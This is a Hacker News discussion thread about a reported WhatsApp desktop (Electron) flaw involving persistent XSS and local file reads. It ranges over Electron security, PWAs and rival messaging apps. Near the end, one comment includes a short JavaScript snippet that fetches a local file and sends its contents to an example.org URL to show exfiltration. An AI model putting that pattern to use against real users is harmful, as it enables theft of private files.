[HN Gopher] I found a WhatsApp security flaw that allowed hacker... ___________________________________________________________________ I found a WhatsApp security flaw that allowed hackers to read the file system Author : ccmpx Score : 254 points Date : 2020-02-04 16:35 UTC (6 hours ago) (HTM) web link (www.perimeterx.com) (TXT) w3m dump (www.perimeterx.com) | kjaftaedi wrote: | Very nice work! Also curious what kind of bounty was paid out for | this. | Deimorz wrote: | The article originally said that he received a $12,500 bounty | for it, but it looks like that's been removed now (maybe you're | not supposed to say). | | You can still see it at both the top and bottom of this | archived copy: | https://web.archive.org/web/20200204164053/http://www.perime... | luckydata wrote: | half of Jeff Bezos' net worth. | oarsinsync wrote: | > If you're going to use Electron, you HAVE to make sure it is | updated with each update of Chromium. | | I never really thought about this, but in retrospect, this is so | blindingly obvious, and is almost certainly a potential exploit | vector to a wide range of electron-based apps. | lima wrote: | It sure is. This is why Chrome apps and progressive web apps | are great - they share the Chrome runtime and inherit its | hardening, security properties and updates. | | Many Electron apps should just be a PWA instead, and many | actually are. Why would I want to install a desktop app for | WhatsApp? It runs just fine in Chrome, and using More Tools -> | Create shortcut..., you can even create a launcher entry that | will launch the page in its own window. | randall wrote: | This needs to be distributable by the website... also with | caching guarantees, desktop capture support (which I think is | there now, but wasn't till just recently) etc. | vbezhenar wrote: | How do I build installer for Chrome PWA? Like if user does | not have Chrome, it should install it. Also i don't want to | bother user with that implicitly installed chrome, so it | should not add shortcuts, etc and just live as an app | launcher. | shawnz wrote: | Don't bundle Chrome, just let the user use whatever browser | they prefer. AFAIK Edge also supports PWAs, but not Firefox | Desktop yet. | onei wrote: | Turns out a PWA works in Firefox too [1] so I'm not sure | it's entirely necessary to force a user to install a | browser just for your app. Edge is/will be chromium, so I | guess Safari is the only major browser to worry about? | | [1] https://blog.mozilla.org/firefox/progressive-web-apps- | whats-... | m-p-3 wrote: | IMO you shouldn't have to make an installer, it should be | the browser's job to expose the feature and integrate | itself to the OS as natively as possible. | bitL wrote: | Because of inability of PWA to write local files at desired | locations (you can at best download a file), PWA's usefulness | is limited as a desktop app replacement technology. The | moment you allow rw local file access you are off to a | security-fun-land. | sayhello wrote: | I beg to disagree :-) | | I've worked on the Native File System API on Chrome. | | It's available through Origin Trial at the moment. | | That said, Web apps can currently emulate reading files and | writing to disk. | | Take a look at this library, which also works as a poly | fill: | | https://github.com/tomayac/browser-nativefs | bitL wrote: | IIRC there was a feud between Chrome developers who | wanted raw file access and Firefox ones who didn't want | it. W3C sided with FF, so we can't build proper desktop | apps using PWA, even if WASM makes them quite fast these | days. Now Chrome devs resuscitated the attempt with NFS | API, so I'll grab my popcorn and watch their interaction | one more time... | lima wrote: | Right, but this is a small minority of applications. | tonyarkles wrote: | I strongly strongly disagree! | | The vast majority of the work I do can be done off-line | with files stored on disk, minus stuff that obviously | needs connectivity (e.g. Slack). Writing text, writing | code, reading/editing documents and spreadsheets, doing | CAD (mechanical and electronics), etc. During the week I | live in the city, but on weekends and occasionally for | longer stretches of time I like to head out to our rural | house for peace and quiet (and focused work). Over time, | the number of applications that _ought_ to work off-line | has been slowly shrinking, whether it 's because they | insist on using cloud storage instead of local storage, | or licensing checks, or whatever. It's really really | disappointing, and I would personally be delighted if I | could get work done without an Internet connection. | shawnz wrote: | You can design a PWA that works offline with local files | on disk already, by using the browser's file select | dialogs. It's not necessary to give the app arbitrary | access to the whole filesystem to get that functionality, | which is what the parent is asking for. | tonyarkles wrote: | I'm genuinely not all that familiar with what PWAs can | and can't do... Would a, for example, Word-like PWA be | able to both load and save files to disk? | tptacek wrote: | The big problem with Electron isn't that it forces you to keep | up with Chrome, although that's important too, but rather that | it links Node.js with content-controlled Javascript, so that | DOM corruption vulnerabilities can be leveraged for RCE, even | in the absence of a Chrome vulnerability. Most Electron RCEs | that you've read about had nothing to do with Chromium. | | There's a whole process for evaluating and auditing Electron | applications, which is harder to do than auditing (for | instance) a native mobile application or, probably, even a | native desktop application. | Invictus0 wrote: | Can you imagine reading this comment 100 years ago? | ASalazarMX wrote: | They would be amazed, as this sounds like incredibly | advanced technology, and maybe disappointed when they find | it was all about imaginary objects in an interactive | projector. | | John Titor would be proud. | stingraycharles wrote: | Why would they need a node process? Are there things an | Electron app needs to do that isn't possible from the Chrome | runtime? And more importantly, why would they need to | directly link with the DOM? | | Sorry I am not very familiar with Electron. | tptacek wrote: | Since bridging Node.js with the DOM is basically the whole | point of Electron, it's a little tough for me to answer | this question. Yes, there are things Electron apps need to | do that you can't do from standard Chrome. | bhaavan wrote: | I think it is a good idea to containerize all electron apps, | and run them only in containers. It is because reducing the | surface area of your code to the system will reduce | vulnerabilities of your code. | imvetri wrote: | TLDR: 1. Altering the text of someone else's reply. 2. Altering | banner image of someone else's reply containing links. 3,4,5. | Good. | Dinux wrote: | I'm a heavy WhatsApp user and I feel like WhatsApp has gone | downhill ever since Facebook took over. Performance is down | significantly, I experience a lot more visible bugs, more and | more exploits are being revealed about seemingly trivial | components (file encryption, browser XSS), and useless features | are beeing added. Its not like WhatsApp Inc. was flawless before | they got acquired, but at least it worked well and most of the | developers _actually_ wanted to make a great chat app. | | Its just a matter of time before Facebook merges WhatsApp with | its Messenger (and keep either of those names). | Stubb wrote: | Signal and Telegram are both solid alternatives built around | different security models. When I get a notification in | Messenger, Instagram, etc., I simply reply back with my contact | info for those apps. Telegram gives you a vanity URL using your | username, which is pretty cool. | Dinux wrote: | Yes I am using Signal. It's just that most people around me | are not on Signal. Trying to convince them to switch is | useless (although I try). WhatsApp is not my first choice | either. | _jal wrote: | Tell them no. | | My perspective is, pick one of the many overlapping | channels we already share or don't bother me. I am not | signing up to yet another spyware-of-the-month app in order | to chase your fashion sense. | roel_v wrote: | Whatsapp has been the default choice for 10 years. From | other people's pov, Signal and Telegram are the 'fashion' | apps. | kelnos wrote: | It's a trade off. In some cases not installing the | messaging app du jour means being left out of group | chats. If that's ok with you, then by all means, allow | yourself to be excluded. But that's not ok with everyone. | meowface wrote: | They would say the same of you, from their perspective. | It's like someone asking you for your Twitter and you | replying that you only use Mastodon. | petre wrote: | I plainly tell them to e-mail me or contact me via Wire or | Signal. | | Maybe this whole Bezos affair would convince them it's | insecure spyware from yours truly Facebook and their | friends in the UAE? I think not. | roywiggins wrote: | The Signal desktop app is also Electron, isn't it? | joecool1029 wrote: | Correct, as of a few years ago. Previously, it used to be a | Chrome app (I think NaCL crap?) | roel_v wrote: | People often say this, but I wonder if they've actually used | those apps. For example Signal, try to back up your chat | history. The hoops you have to jump through are not feasible | for non-technical users. There were many more relatively | small issues like this (I tried switching 6 months ago) but I | forgot most. | | For a basic 'send text message from user A to user B' app, | there are lots of options. Something that is as convenient as | Whatsapp though - there are none. | Shoetp wrote: | I've been using Telegram for something like 5 years now. | I'm curious, what's the problem with it? | akerro wrote: | How come that WhatsApp has so many security flaws recently and | Signal isn't affected? This cannot be coincidence right? Signal | has less people working on it, no massive corporation behind the | product, more people as smart as Moxie working on it. I don't | believe these flaws are just bugs... Right? | kelnos wrote: | Signal has a team of people behind it whose main focus is | security and privacy. Of course everyone makes security | mistakes, but I'd expect the Signal team to make fewer of them. | | In this case, I would say the fewer people working on Signal is | a strength, not a weakness. | bhaavan wrote: | What is the basis of the assertion that "Signal isn't | affected"? Do you track CVEs for Signal? | wiredfool wrote: | Wonder what other electron apps have issues like this, or at | least did until they quickly updated their electron version. | Priem19 wrote: | Well of course you did, it's WhatsApp. That's like saying "I | found a health concern with smoking cigarettes." | vmchale wrote: | sounds like the whatsapp developers are gunning to be aquihired | by the DNC | kome wrote: | i'm starting to think that Durov was right after all... | mrnobody_67 wrote: | This is probably how the Saudi's got the data off Jeff's phone... | boring_twenties wrote: | You think Bezos was running the desktop/Electron app on his | phone? | Dinux wrote: | He could have used the OSX desktop app. But the Bezos thing | seems to be unrelated (as far as I can tell). | h1fra wrote: | wow, testing for `alert()` in a javascript environment is like | the first thing you learn. Feels bad for whatsapp engineers :/ | dancemethis1 wrote: | They are busy tampering with OpenWhisper. | robocat wrote: | Someone should create a nice little canary.js that reports on | alert() etc being called by setting window.alert = function | honeypotFunction(){...};. Although perhaps the noise from | extensions and users would make the signal too useless. | dmurray wrote: | He didn't really demonstrate how "hackers" could read the file | system, right? The screenshot of etc/hosts is on the same | computer where that hosts file lives. | | > There are more than 5 different 1-day RCEs in Chromium 69 or | higher, you just need to find a published one and use it through | the persistent XSS found earlier and BAM: Remote Code Execution | ACHIEVED! | | > I did not take the time to actually exploit a public RCE | | The XSS vulnerability is serious and looks fully deserving of a | bug bounty. Likewise, using an old version of Electron is asking | for trouble. But for me this PoC should include the extra step of | "just" exploiting one of the RCE holes he's sure must exist. | JoshTriplett wrote: | > He didn't really demonstrate how "hackers" could read the | file system, right? The screenshot of etc/hosts is on the same | computer where that hosts file lives. | | If you can fetch arbitrary URLs, and the contents of local | files, you can trivially exfiltrate the latter with the former. | Just fetch the local file, then fetch an URL that encodes the | contents of the local file. var text = | fetch("/local/secret/file"); | fetch("https://example.org/"+encode(text)); | nebulous1 wrote: | > He didn't really demonstrate how "hackers" could read the | file system, right? The screenshot of etc/hosts is on the same | computer where that hosts file lives. | | Are you saying he could alert it but not exfiltrate it? ___________________________________________________________________ (page generated 2020-02-04 23:00 UTC)